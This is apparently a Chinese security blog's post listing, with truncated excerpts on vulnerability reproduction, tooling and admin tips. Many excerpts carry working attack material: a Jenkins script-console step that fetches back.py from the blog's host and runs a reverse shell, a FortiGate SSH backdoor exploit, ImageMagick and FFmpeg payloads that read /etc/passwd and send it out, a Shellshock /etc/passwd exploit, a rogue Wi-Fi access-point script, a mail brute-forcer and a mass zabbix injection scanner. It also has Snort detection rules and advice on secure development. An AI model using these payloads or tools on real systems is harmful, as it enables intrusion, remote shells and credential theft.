这篇文章主要是记录下搭建漏洞测试环境的过程，然而从中午开始，断断续续的一直折腾到凌晨，只是搭建了成功了本地能复现的环境，并没有实现远程复现。究其原因，主要是固执到一直想用daocloud来搭建测试环境，坑好多，花了太多时间来填坑了，记录下过程。docker pull wordpress:4.6-php5.6-apache docker pull daocloud.io/library/mysql:5.7 docker run --name some-mysql -e MYSQL_ROOT_PASSWORD=xxxx -e MYSQL_DATABASE=wdpress -d daocloud.io/library/mysql:5.7 #启动1个名称为wordpress的容器，链接了some-mysql容器用来存储数据，并指定了some-mysql容器中有关数据库的一些配置 docker run --name wordpress --link some-mysql:mysql -p 80:80 -e WORDPRESS_DB_NAME=wdpress -e WORDPRESS_DB_USER=root -e WORDPRESS_DB_PASSWORD=xxxx -d wordpress:4.6-php5.6-apache以上环境可以安装成功wordpress，蛋疼的是使用密码重置功 ...继续阅读 (5)

Jenkins的又一java反序列化漏洞，攻击者使用该漏洞可以在被攻击服务器执行任意代码，漏洞利用不需要任何的权限。有关漏洞的原理分析可以见下文：SSD Advisory – CloudBees Jenkins Unauthenticated Code Execution看到其它文章中介绍受影响的范围：影响低于 2.56 的所有 Jenkins 主线版本影响低于 2.46.1 的所有 Jenkins LTS 版本我搭建了多个测试环境，分别是jenkins 2.3、jenkins 2.31都没有复现成功，使用jenkins 2.32.1成功复现。利用老外文章的代码，导出成payload.jar包，用来生成攻击用的payload文件。可以自定义需要执行的命令：java -jar payload.jar jenkins_poc1.ser "/usr/bin/touch /tmp/jenkinsTestNxadmin"然后利用老外提供的python脚本向jenkins服务器提交post请求，就可以成功在被攻击服务器/tmp目录下生成文件。也可以使用dnslog之类的来测试，如图：修复建议：Jenkins 主线版本升级到 2.57Jenkins LTS 版本 2.46.2参考链接：http://www.securityfocus.com/bid/98056/infohttps:/ ...继续阅读 (5)

近日，Cisco Talos组织的向zabbix反馈了个远程代码执行漏洞，漏洞编号CVE-2017-2824，简单看了看，查了点资料，翻译整理下该漏洞。不熟悉zabbix proxy和zabbix server，不确定是不是server必须指定proxy才可以互相进行通信，还是任意proxy都可以向zabbix server发起请求。因此该漏洞是否鸡肋还不太确定，等搭建测试完才能知道是鸡肋还是危害较大。目前看还是有一些利用条件的，比如需要zabbix server配置Auto-discover/Auto registration功能，还有通信的时候有个key字段好像是zabbix server提前设定好的，不确定这个key如果不对，能不能discovery data成功，欢迎大神评论指点。Zabbix的Trapper功能是一个提供给Zabbix Proxy和Zabbix Server的网络服务，通过TCP端口10050进行通信，类似一种api服务，其中有”discovery data”和”command”这两个请求。其中command这个请求实际上调用的是Zabbix Server上给定主机的Scripts任务，在zabbix 2.4x版本，默认的有3条Scripts存在于mysql中的scripts表中，对应在zabbix serv ...继续阅读 (5)

安全攻城狮在公司存在之初，刚开始更多进行的是救火的工作，救火工作并不能从根源上解决漏洞的产生。如何最大化的将漏洞扼杀在产生之初，这个实际上某个dalao提的问题，问了几位老司机，做一下小笔记。1，定期化的安全培训，需要注重培训效果、培训次数、培训覆盖面、帮助文档、培训反馈；2，系统设计阶段，就需要安全测试小伙伴的介入，了解开发过程、熟悉业务流程，只有掌握足够多的信息，才能发现更多的问题；3，在目标系统测试环境部署支持agent的扫描器，部署agent之后，可以和扫描器进行联动；4，给功能测试、性能测试同学开发安全相关插件，插件的功能是收集系统的各种请求，并上报给扫描器进行自动化扫描；5，部署针对测试网段的流量镜像，从流量中提取分离出URL，进行自动化扫描。6，黑盒测试、白盒代码审计也是必须的。以上几点算是属于方法论吧，具体的技术手段可以借助某些开源系统，也可以自己造轮子。 ...继续阅读 (6)

安恒给官方上报的，然后官方选择了1个对国内来说比较敏感的时期发了公告出来，好蛋疼。该漏洞的CVE编号是CVE-2017-5638(s2-045)，攻击者利用该漏洞可以进行远程命令执行，从而获取更高的服务器权限。查了点资料，发现跟struts2配置中常量的配置有关，以struts-2.3.4版本为例，涉及到的常量配置文件有：struts-2.3.4/src/core/src/main/resources/org/apache/struts2/default.propertiesstruts.multipart.parser=jakartastruts-2.3.4/src/core/src/main/resources/struts-default.xml注：在部分高版本中，该文件中struts.multipart.handler变成了struts.multipart.parser.该漏洞跟struts.multipart.handler的设置有关，默认使用的就是Jakarta对应类org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest。根据struts2加载常量的顺序(参考后文引用内容)，struts-default.xml中的配置会覆盖掉default.properties的配置。因此只要struts.mult ...继续阅读 (5)

Atlassian Confluence是澳大利亚Atlassian公司的一套专业的企业知识管理与协同软件，也可以用于构建企业WiKi。该软件可实现团队成员之间的协作和知识共享。Atlassian Confluence 5.8.17之前版本中存在安全，该漏洞源于spaces/viewdefaultdecorator.action和admin/viewdefaultdecorator.action文件没有充分过滤’decoratorName’参数。远程攻击者可利用该漏洞读取配置文件。漏洞poc:https://www.nxadmin.com/confluence/spaces/viewdefaultdecorator.action?decoratorName=file:///etc/passwd如图： ...继续阅读 (4)

以前没用过的模块，今天用到，所以记录下方便以后用的时候想起来….PyQuery可以优雅的获取web的title等，简单示例：from pyquery import PyQuery r=PyQuery('http://www.nxadmin.com') print r('title').text()项目git地址：https://github.com/gawel/pyquery.git需要先安装lxml、cssselect模块，如果pip源被墙，可能会报错，因此建议修改一下pip源：Mac：新建~/.pip/pip.conf文件，内容如下：[global] index-url = http://pypi.douban.com/simple [install] trusted-host = pypi.douban.com ...继续阅读 (5)

好久不用，都变成渣了。。。#表结构相同进行合并 insert B select * from A where not exists(select * from b where b.主键=a.主键) 或 insert ignore into B select * from A;#刷新数据库管理的权限更改 mysqladmin -u root -ptmppassword flush-privileges #刷新数据库表的更改 mysqladmin -u root -ptmppassword flush-tables只导出数据mysqldump　-t　数据库名　-uroot　-p　>　nxadmin.sql只导出表结构mysqldump　--opt　-d　数据库名　-u　root　-p　>　nxadmin.sql导出数据和表结构mysqldump　数据库名　-uroot　-p　>　nxadmin.sql ...继续阅读 (5)

测试android app的时候，可能会用到Android模拟器，常见的模拟器比如android studio自带的AVD，也有一些其它的比如夜神安卓模拟器等。可能会需要对app进行抓包，抓取一些接口的请求，进行改包重放等操作。分享一下使用burpsuite进行抓包的设置：1，Wirless & networks 设置–Cellular networks，如图： 2，点击”Access Point Names”，如图： 3，Proxy、Port设置为burpsuite所在机器的IP和监听端口，如图： 然后就可以愉快的抓包测试了，https的没有测试过，抓包http的是没有问题的。不过现在很多app都用的是其它协议~~ ...继续阅读 (3)

之前工作中搭建开源IDS，架构是suricata+barnyard2+snort规则。跟同事测试写了一些常见web漏洞扫描器的规则，分享出来。很多都是根据UA来识别的，因此比较简单，可能也会有误报。#Web app scan tools rules # alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"Sqlmap found"; flow:to_server,established; content:"|0d 0a|User-Agent|3a| sqlmap"; classtype:web-application-attack; sid:90000001; rev:11;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"HPWebInspect found"; content:"X-Scan-Memo"; classtype:web-application-attack; sid:90000003; rev:11;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"HPWebInspect found"; content:"CustomCookie"; classtype:web-application-attack; ...继续阅读 (4)

vps到期之后，续费之后，重启了nginx。登录后台编辑文章，发现加载不出来文章内容，并且查看媒体库，看不到任何上传的图片内容。症状如图：刚开始以为是空间权限的关系，各种调整目录权限等，都没有解决，百度找到解决方法如下：vim wp-config.php增加如下内容：define(‘CONCATENATE_SCRIPTS’, false); ...继续阅读 (4)

从360播报(安全客)转载过来的，虽然是我投的稿 ~^_^ !原始漏洞分析地址：http://bobao.360.cn/learning/detail/3027.html安全客文章地址：http://legalhackers.com/advisories/MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662.html就我目前测试的情况来看，这个漏洞比较鸡肋，原因有以下两点：1，使用默认方式安装的mysql，mysql用户并没有配置文件/etc/mysql/my.cnf的所属权限；2，不关闭selinux或apparmor的话，exp脚本执行是会报错的。legalhackers原文中提到这个漏洞的前提是很多人按照错误的安装指南来进行权限配置，将配置文件的所属用户修改成了mysql。不过貌似漏洞发现者手里还藏了几个更加严重的mysql漏洞，并没有披露。I. VULNERABILITYMySQL <= 5.7.15 远程代码执行/权限提升 (0day)5.6.335.5.52克隆mysql的同样受影响, 包括:MariaDB PerconaDBII. INTRODUCTION一个独立的研究组织发现多处严重的Mysql漏洞，此次通报的是其中比较严重的一个漏洞CVE-2016-6662，它允许攻击者远程注入恶意设置 ...继续阅读 (17)

Secure Socket Funneling (SSF) is a network tool and toolkit. It provides simple and efficient ways to forward data from multiple sockets (TCP or UDP) through a single secure TLS link to a remote computer.from:n0whereFeatures:Local and remote TCP port forwardingLocal and remote UDP port forwardingLocal and remote SOCKS serverLocal and remote shell through socketNative relay protocolTLS connection with strongest cipher-suites The initial aim of SSF was to provide an easy way for users and developers to multiplex and demultiplex various network data flows. It was designed to:be cross platfor ...继续阅读 (13)

服务器A搭建的mongodb，为了安全起见，在配置文件/etc/mongod.conf中设置了 band_ip=127.0.0.1。最近要允许其它主机访问服务器A的mongodb，理所当然的以为在band_ip中增加需要访问的主机的IP地址就可以实现这个需求，然后修改成如下之后：band_ip=172.0.0.1,10.20.12.33重启mongod服务，报错如下：ERROR: listen(): bind() failed errno:99 Cannot assign requested address for socket: 10.20.12.33:27017网上看的很多文章都说可以绑定多个IP，然而并没有说明band_ip实际只能绑定mongodb服务所在机器的网卡IP。为了防止被入侵，做了如下安全策略；1，band_ip=0.0.0.02，增加iptables规则：#禁止所有ip访问27017端口iptables -I INPUT -p tcp –dport 27017 -j DROP#允许10.20.12.33访问27017端口iptables -I INPUT -s 10.20.12.33 -p tcp –dport 27017 -j ACCEPT#允许本机访问27017端口iptables -I INPUT -s 127.0.0.1 -p t ...继续阅读 (10)

阿里云的VPS，安装的是镜像市场中的Docker运行环境（Ubuntu 64位）系统，用docker pull镜像的时候会报错，具体错误如下：Unable to find image ‘busybox’ locallyPulling repository registry2016/08/24 16:29:53 Could not reach any registry endpointdocker version 查看到的信息如下：Client version: 1.2.0Client API version: 1.14Go version (client): go1.3.1Git commit (client): fa7b24fOS/Arch (client): linux/amd64Server version: 1.2.0Server API version: 1.14Go version (server): go1.3.1Git commit (server): fa7b24f针对此错误的解决方法如下：1，需要升级docker，具体命令如下：sudo apt-get install docker.io2，不过阿里的这个镜像源有点问题，升级的时候部分源是404，会报错。需要修改/etc/apt/sources.list文件，修改为如下内容：deb htt ...继续阅读 (4)

前几天wooyun以及朋友圈被ImageMagick的远程命令执行漏洞（CVE-2016–3714）给刷屏了，今天又爆出了ImageMagick的另外一处命令执行漏洞。老外对漏洞的说明原文如下：All existing releases of GraphicsMagick and ImageMagick support a file open syntax where if the first character of the file specification is a '|', then the remainder of the filename is passed to the shell for execution using the POSIX popen(3C) function. File opening is handled by an OpenBlob() function in the source file blob.c. Unlike the vulnerability described by CVE-2016-3714, this functionality is supported by the core file opening function rather than a delegates subsystem usual ...继续阅读 (34)

昨天经历过ImageMagick命令执行漏洞的洗礼之后，今天又有FFmpeg文件读取漏洞，真是激情的一周啊！看了老外写的文章，大概理解的利用方式如下：#EXTM3U #EXT-X-MEDIA-SEQUENCE:0 #EXTINF:10.0, concat:http://www.nxadmin.com/header.m3u8|file:///etc/passwd #EXT-X-ENDLIST以上内容保存成test.avi，是用来上传到被攻击服务器的。#EXTM3U #EXT-X-MEDIA-SEQUENCE:0 #EXTINF:, http://www.nxadmin.com?以上内容保存成header.m3u8，将header.m3u8上传到你的服务器，然后把test.avi上传到攻击服务器，如果有漏洞，会收到如下的日志：   会收到三条日志记录，第一条是请求header.m3u8文件的，第三条中就包含了读取的部分文件内容，说明是存在此漏洞的。header.m3u8文件的内容大概是将让你的web产生日志并且传回读取的文件内容。具体的参考老外写的分析文章：https://habrahabr.ru/company/mailru/blog/274855/还有ffmpeg的说明文档：https://www.ffmpeg.org/ffmpeg-protocols ...继续阅读 (295)

ImageMagick命令执行漏洞(CVE-2016–3714)5月3日，ImageMagick官方披露称，目前ImageMagick存在一处远程命令执行漏洞（CVE-2016–3714），当其处理的上传图片带有攻击代码时，可被远程执行任意代码，进而导致攻击者控制服务器。ImageMagick是一款开源图片处理库，支持PHP、Ruby、NodeJS和Python等多种语言，使用非常广泛。包括PHP imagick、Ruby rmagick和paperclip以及NodeJS imagemagick等多个图片处理插件都依赖它运行。著名的开源应用wordpress已经受此漏洞的影响，攻击者有上传图片的权限，就能直接获取wordpress应用服务器的管理权限。具体的测试方法参考建议业务开发检查自身的web网站，如有使用ImageMagick进行图片处理、渲染，可以按照下文中的方法进行测试，重点检查头像上传、图片上传等功能。具体的攻击代码如下：push graphic-context viewbox 0 0 640 480 fill 'url(https://example.com/image.jpg"|whoami")' pop graphic-context只需要将以上内容保存成1.jpg，上传到存在漏洞的服务器，就可以执行whoami命令。可以 ...继续阅读 (219)

FortiGate是Fortinet公司的硬件防火墙品牌，防火墙用的系统应该就是FortiGate OS(飞塔系统)，貌似公司创始人是华裔，看介绍是一家全球性的网络安全设备供应商，好霸气。看国内转发的文章是说，是老外在twitter上发布的，看样子以后得多去twitter上瞅瞅了，贴上exploit-db上的利用payload，代码如下：#!/usr/bin/env python # SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7 # Usage: ./fgt_ssh_backdoor.py <target-ip> import socket import select import sys import paramiko from paramiko.py3compat import u import base64 import hashlib import termios import tty def custom_handler(title, instructions, prompt_list): n = prompt_list[0][0] m = hashlib.sha1() m.update('\x00' * 12) m.update(n + & ...继续阅读 (229)

前不久爆出的Java反序列化命令执行漏洞，一直没有进行测试。最近遇到个Jboss的站点，就抽空测试学习了一下利用的方法，过程中遇到很多坑啊，请教了很多小伙伴，非常感谢紫霞仙子大师傅的指点。随风师傅的博客上有具体的漏洞原理分析：http://www.iswin.org/2015/11/13/Apache-CommonsCollections-Deserialized-Vulnerability/利用给出的POC，先进行payload的生成，使用eclipse就可以搞定，需要导入外部的ysoserial.jar这个JAR包，如图：        POC代码中可以修改反弹SHELL的外网IP地址和端口，代码段：public static void main(final String[] args) throws Exception { final Object objBefore = CommonsCollections1.class.newInstance() .getObject("10.18.180.34:8080");随风给的反弹SHELL的原理：反弹shell的原理，通过classload从我博客远程加载一个http://www.isiwn.org/attach/i ...继续阅读 (237)

1,系统介绍Jenkins是一个开源软件项目，旨在提供一个开放易用的软件平台，使软件的持续集成变成可能。2,漏洞描述Jenkins管理登陆之后，后台”系统管理”功能，有个”脚本命令行的”功能，它的作用是执行用于管理或故障探测或诊断的任意脚本命令，功能如图：     利用该功能，可以执行系统命令，例如执行”whoami”命令，如图所示：     该功能实际上Jenkins正常的功能，由于很多管理账号使用了弱口令，或者管理后台存在未授权访问，导致该功能会对Jenkins系统服务器产生比较严重的影响和危害。3,漏洞利用1） 直接wget下载back.py反弹shell,如下：println "wget http://www.nxadmin.com/tools/back.py -P /tmp/".execute().text println "python /tmp/back.py 10.1.1.111 8080".execute().text2)多种写webshell方法，如下：① wget写webshell println "wget http://shell.nxa ...继续阅读 (162)

想写个exploit，需要安装Varnish进行测试。在Centos安装Varnish3.0.4，make的时候遇到如下错误：error: editline/readline.h: No such file or directory按照百度解决方案如下：yum install readline-develyum install ncurses-devel记录一下，希望对以后遇到此问题的小伙伴有所帮助！  ...继续阅读 (59)

BurpSuite安装插件SQLipy的时候遇到如下的错误：java.lang.Exception: Failed to open Jython JAR fileat burp.p9b.<init>(Unknown Source)at burp.hec.a(Unknown Source)at burp.c5c.a(Unknown Source)at burp.c5c.a(Unknown Source)at burp.ptf.d(Unknown Source)at burp.ptf.a(Unknown Source)at burp.bq.run(Unknown Source)at java.lang.Thread.run(Unknown Source)如图：         是由于缺少Jython导致的，导入jython就可以了，如图：                下载地址：http://www.jython.org/downloads.html需要翻墙，下载的时候注意文件大小，可能会出现下载的文件异常的情况，建议使用迅雷下 ...继续阅读 (240)

最近做了一个小的安全意识培训，目的是让小伙伴们谨防不信任的Wifi热点，用到了kali linux下的一些小工具，记录一下，具体的shell脚本如下：#! /bin/bashcase $1 in“start”)sleep 1ifconfig wlan2 downsleep 1iwconfig wlan2 mode monitorsleep 1ifconfig wlan2 upsleep 2airmon-ng start wlan2sleep 1airbase-ng -e hellotest  -c 11 wlan2sleep 1;;“atup”)sleep 1ifconfig at0 upsleep 1ifconfig at0 10.0.0.1 netmask 255.255.255.0sleep 1route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1sleep 1echo “1” >/proc/sys/net/ipv4/ip_forwardsleep 2dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0sleep 2service isc-dhcp-server startsleep ...继续阅读 (36)

看到有小伙伴问fofa搜索结果采集的问题http://zone.wooyun.org/content/17971贴上之前写过的一个简单的采集加利用，代码效率特别低，就抛砖引玉一下！fofa在不登录状态下默认只展示一部分搜索结果，可以利用它提供的api接口来获取所有的搜索结果。用户名+对应key的形式。代码是搜索  title=zabbix，并对获取的结果进行zabbix注入漏洞的利用，最终打印出存在漏洞的URL和密码md5.#coding:utf-8 import urllib2,urllib,cookielib import re,sys import base64 import os,json def vulwebsearch(keywords): vulhostlist=[] urlenkeywords=urllib2.quote(keywords) searchurl="http://fofa.so/api/result?qbase64="+base64.b64encode(keywords)+"&key;=d69f306296e8ca95fded42970400ad23&email;=her0m@qq.com" req=urllib2.urlopen(searchurl) restring=req.read( ...继续阅读 (25)

之前发了一个帖子：http://zone.wooyun.org/content/20379总结了几种企业邮箱爆破的一些小技巧，直接贴出具体的爆破脚本吧。以163企业邮箱为例，目前这个是单线程的，也是从网上找到的爆破google邮箱的代码简单修改成的，只支持pop3协议。小伙伴们可以修改成支持多种协议、多线程的，坐等。贴上代码：#!usr/bin/python #Email Pop3 Brute Forcer #http://www.darkc0de.com #d3hydr8[at]gmail[dot]com #http://www.nxadmin.com import threading, time, random, sys, poplib from copy import copy if len(sys.argv) !=3: print "\n\t EmailPopBruteForcer v1.0" print "\t --------------------------------------------------\n" print "\t Usage: ./qmailpopbrute.py\n" sys.exit(1) server = "pop.qiye.163.com" success = [] t ...继续阅读 (187)

最近用django开发小东西，用的测试机是其它离职小伙伴的，不知道mysql密码，百度到下面的文章，亲测成功，分享出来！本人在CentOS6.4上安装万mysql后，无法通过root进入，因为安装的时候，并没有设置root密码，似乎有个初始随机密码，但是不记得了，太麻烦，直接重置root密码。使用rpm包安装完mysql后，按照一下步骤重置root密码：启动mysql：#/etc/init.d/mysql start启动成功后查看mysql进程信息，获取mysqld_safe的安装目录(非常关键)：#ps -ef | grep -i mysqlroot 3466 1 0 01:45 pts/1 00:00:00 /bin/sh/usr/bin/mysqld_safe–datadir=/var/lib/mysql –pid-file=/var/lib/mysql/BSC.TEST.pidmysql 3569 3466 16 01:45 pts/1 00:00:00 /usr/sbin/mysqld –basedir=/usr –datadir=/var/lib/mysql –plugin-dir=/usr/lib64/mysql/plugin –user=mysql –log-error=/var/l ...继续阅读 (28)

本文重点是让大家了解JAVA代码审计的基础，会以漏洞示例的方式介绍JAVA代码中常见Web漏洞的形成和针对的修复方案，文章是在国外网站上看到的，因为在接触JAVA代码审计，感觉挺高大上的文章，很适合对JAVA代码审计感兴趣的童鞋找感觉之用，就根据自己的理解翻译了过来，拿去某平台投稿，被鄙视说太基础，就只好发自己的Blog上了。SQL注入SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序，而这些输入大都是SQL语法里的一些组合，通过执行SQL语句进而执行攻击者所要的操作，其主要原因是程序没有细致地过滤用户输入的数据，致使非法数据侵入系统。漏洞示例：<%@page import="java.sql.*"%> <%@ page language="java" contentType="text/html; charset=ISO-8859-1" pageEncoding="ISO-8859-1"%>DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"<% String user = request.getParameter("user"); String pass = request.getPar ...继续阅读 (29)

自从去了新公司之后，工作太忙，变的有点懒了，很久没有更新Blog。今天跟几个小伙伴一起吃饭，小伙伴提起我的Blog，想想是该更新更新了，就把我投稿给sobug的这篇转过来吧，关于Android app安全测试的基础东东，在Sobug 的url:https://sobug.com/article/detail/7背景最近这两年移动端真是非常火，每个单位或多或少都会有那么几款App，对于我们Web安全攻城师来说，App安全也需要或多或少的了解一些。年初单位来了一位对App安全略有研究的小伙伴，某日闲来无事教了笔者几招，分享给大家。有句古语:”工欲善其事，必先利其器”，我们要研究App安全，没有几款高大上的神器是会非常麻烦的，因此本文主要给大家分享一下笔者学到的一些基础知识，主要是一些移动端测试辅助工具的使用。模拟器模拟器笔者经常使用有两款，一款是BlueStacks，这款个人感觉是做的非常不错的，一般安装操作App非常流畅，不会有卡死的情况。另外一款就是SDK模拟器(Software Development Kit)了，这款是特别高大上的，类似虚拟机vm一样，可以建立多个虚拟机，安装不同的android系统。BlueStacks下载地址：1http://www.bluestacks.net.cn/Download/安装的时候会提示安装”给力助手”，给力助手是辅助操作的，可以安装电脑上下 ...继续阅读 (37)

这几天Bash被爆存在远程命令执行漏洞(CVE-2014-6271)，昨天参加完isc，晚上回家测试了一下，写了个python版本的测试小基本，贴上代码：#coding:utf-8 import urllib,httplib import sys,re,urlparse #author:nx4dm1n #website:http://www.nxadmin.com def bash_exp(url): urlsp=urlparse.urlparse(url) hostname=urlsp.netloc urlpath=urlsp.path conn=httplib.HTTPConnection(hostname) headers={"User-Agent":"() { :;}; echo `/bin/cat /etc/passwd`"} conn.request("GET",urlpath,headers=headers) res=conn.getresponse() res=res.getheaders() for passwdstr in res: print passwdstr[0]+':'+passwdstr[1] if __name__ ...继续阅读 (23)